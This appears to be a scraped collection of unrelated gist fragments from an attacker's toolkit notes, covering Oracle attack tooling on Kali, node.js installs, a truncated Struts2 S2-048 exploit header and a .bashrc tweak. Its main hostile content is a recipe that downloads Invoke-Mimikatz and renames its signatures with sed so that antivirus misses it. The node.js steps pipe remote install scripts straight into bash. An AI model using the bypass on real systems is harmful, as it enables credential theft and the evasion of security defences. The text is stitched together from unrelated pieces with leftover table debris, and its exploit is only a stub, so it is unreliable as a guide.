| ########### Build to attack Oracle in under 20 mins ########### | |
| [] Kali 2018.1 (64bit) | |
| root@kali:~# mkdir /opt/oracle | |
| root@kali:~# cd /opt/oracle | |
| root@kali:/opt/oracle# wget instantclient-basic-linux.x64-12.2.0.1.0.zip (68mb) | |
| root@kali:/opt/oracle# wget instantclient-sqlplus-linux.x64-12.2.0.1.0.zip (1mb) | |
| root@kali:/opt/oracle# wget instantclient-sdk-linux.x64-12.2.0.1.0.zip (1mb) | |
| [] Download from http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html (x86_64) xce/orc |
Getting node.js to work in Kali Linux:
install node version manager :
wget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.31.4/install.sh | bash or wget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.31.4/install.sh | zsh
depending which shell you are using: bash, zsh, fish etc. use diffrent pipe option
why? Because g++ building NODE sucks.
curl -sL https://deb.nodesource.com/setup_9.x | sudo -E bash -
apt-get install nodejs
node -v v9.11.1
| #!/usr/bin/python | |
| # Strut2 S2-048 Headers Exploit | |
| # From https://github.com/rapid7/metasploit-framework/issues/8064 | |
| # From CVE-2017-9791 | |
| # From CVE-2017-5638 | |
| # Coded by Xcepti0n | |
| import requests |
| Add the following to your .bashrc | |
| if [[ $- == *i* ]]; then | |
| export SHELL=zsh | |
| exec zsh -l | |
| fi |
| # AV Bypass to run Mimikatz | |
| # From: https://www.blackhillsinfosec.com/?p=5555 | |
| # Server side: | |
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
| sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |